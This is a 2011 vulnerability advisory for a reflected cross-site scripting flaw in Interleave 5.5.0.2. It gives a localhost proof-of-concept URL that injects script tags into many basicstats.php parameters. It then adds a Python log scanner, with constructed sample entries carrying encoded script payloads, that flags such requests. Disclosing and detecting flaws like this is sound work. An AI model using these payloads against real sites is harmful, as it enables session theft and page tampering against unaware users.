Interleave version 5.5.0.2 suffers from a reflected cross-site scripting vulnerability.
------------------------------------------------------------------------
Software................Interleave 5.5.0.2
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.interleave.nl/en/
Release Date............3/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
........................Bryce Darling <bryce@autosectools.com>
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in Interleave 5.5.0.2
can be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/interleave-5.5.0.2-stable-20110227/basicstats.php?AjaxHandler=0<script>alert(0)<%2fscript>&e=1<script>alert(0)<%2fscript>&eid=2<script>alert(0)<%2fscript>&id=3<script>alert(0)<%2fscript>&recordid=4<script>alert(0)<%2fscript>&templateid=5<script>alert(0)<%2fscript>&fileid=6<script>alert(0)<%2fscript>&tid=7<script>alert(0)<%2fscript>&username=8<script>alert(0)<%2fscript>&password=9<script>alert(0)<%2fscript>&repository=10<script>alert(0)<%2fscript>&GetCSS=11<script>alert(0)<%2fscript>&GetjQueryUiPlacementJS=12<script>alert(0)<%2fscript>&ShowEntityList=13<script>alert(0)<%2fscript>&ShowTable=14<script>alert(0)<%2fscript>&nonavbar=15<script>alert(0)<%2fscript>&tab=16<script>alert(0)<%2fscript>&CT=17<script>alert(0)<%2fscript>
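
--Detection (added example)--
The following is an added example, not part of the original advisory or of Interleave: a log check that flags requests to basicstats.php whose query parameters decode to HTML markup, as in the PoC above. It assumes Apache common/combined access-log format (the advisory's test platform was XAMPP); the log entries and client addresses are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line of an Apache access-log entry (common/combined format assumed).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Start of a tag: "<", optionally "/" or "!", then a letter.
MARKUP = re.compile(r"<\s*[/!]?\s*[A-Za-z]")

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (%253C -> %3C -> <), bounded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Names of basicstats.php query parameters whose value carries markup."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/basicstats.php"):
        return []
    return [name
            for name, value in parse_qsl(parts.query, keep_blank_values=True)
            if MARKUP.search(decode_fully(value))]

def scan(log_lines):
    """Return (client address, parameter names) for each flagged request."""
    findings = []
    for line in log_lines:
        match = REQUEST.search(line)
        names = suspicious_params(match.group(1)) if match else []
        if names:
            findings.append((line.split()[0], names))
    return findings

# Constructed sample entries (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Mar/2011:10:00:00 +0000] "GET /interleave/basicstats.php?tab=2&nonavbar=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Mar/2011:10:01:12 +0000] "GET /interleave/basicstats.php?tid=7%3Cscript%3Ealert(0)%3C%2fscript%3E&tab=1 HTTP/1.1" 200 5301',
    '203.0.113.5 - - [03/Mar/2011:10:02:40 +0000] "GET /interleave/basicstats.php?eid=2%253Cscript%253E HTTP/1.1" 200 5288',
    '192.0.2.10 - - [03/Mar/2011:10:03:05 +0000] "GET /interleave/index.php?q=%3Cb%3E HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for client, names in scan(SAMPLE_LOG):
        print(client, ",".join(names))
```

The check is scoped to the script named in the PoC; a value such as "1 < a" would also match, so treat hits as leads for review rather than confirmed exploitation attempts.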